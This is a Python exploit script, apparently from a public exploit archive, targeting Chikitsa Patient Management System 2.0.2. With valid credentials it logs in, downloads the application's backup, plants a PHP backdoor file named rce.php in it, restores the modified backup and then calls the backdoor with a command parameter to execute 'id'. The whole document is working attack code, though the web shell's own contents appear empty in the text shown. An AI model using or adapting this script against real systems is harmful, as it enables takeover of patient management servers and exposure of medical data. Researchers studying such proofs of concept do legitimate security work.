# Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated) # Date: 03/12/2021 # Exploit Author: 0z09e (https://twitter.com/0z09e) # Vendor Homepage: https://sourceforge.net/u/dharashah/profile/ # Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download # Version: 2.0.2 # Tested on: Ubuntu import requests import os from zipfile import ZipFile import argparse def login(session , target , username , password): print("[+] Attempting to login with the credential") url = target + "/index.php/login/valid_signin" login_data = {"username" : username , "password" : password} session.post(url , data=login_data , verify=False) return session def download_backup( session , target): print("[+] Downloading the backup (This may take some time)") url = target + "/index.php/settings/take_backup/" backup_req = session.get(url , verify=False) global tmp_dir tmp_dir = os.popen("mktemp -d").read().rstrip() open(tmp_dir + "/backup_raw.zip" , "wb").write(backup_req.content) print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip") def modify_backup(): print("[+] Modifying the backup by injecting a backdoor.") zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r') zf.extractall(tmp_dir) zf.close() open(tmp_dir + "/uploads/media/rce.php" , "w").write("") os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read() def upload_backup(session , target): print("[+] Uploading the backup back into the server.(This may take some time)") url = target + "/index.php/settings/restore_backup" file = open(f"{tmp_dir}/backup_modified.zip" , "rb").read() session.post(url , verify=False ,files = {"backup" : ("backup-modified.zip" , file)}) print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php") print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}") def main(): parser = argparse.ArgumentParser(""" __ _ __ _ __ _____/ /_ (_) /__(_) /__________ _ / ___/ __ \/ / //_/ / __/ ___/ __ `/ / /__/ / / / / ,< / / /_(__ ) /_/ / \___/_/ /_/_/_/|_/_/\__/____/\__,_/ Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution : POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter) req_args = parser.add_argument_group('required arguments') req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa") req_args.add_argument("-u" , "--username" , help="Username" , required=True) req_args.add_argument("-p" , "--password" , help="password", required=True) args = parser.parse_args() target = args.URL if target[-1] == "/": target = target[:-1] username = args.username password = args.password session = requests.session() login(session ,target , username , password) download_backup(session , target ) modify_backup() upload_backup(session , target) if __name__ == "__main__": main()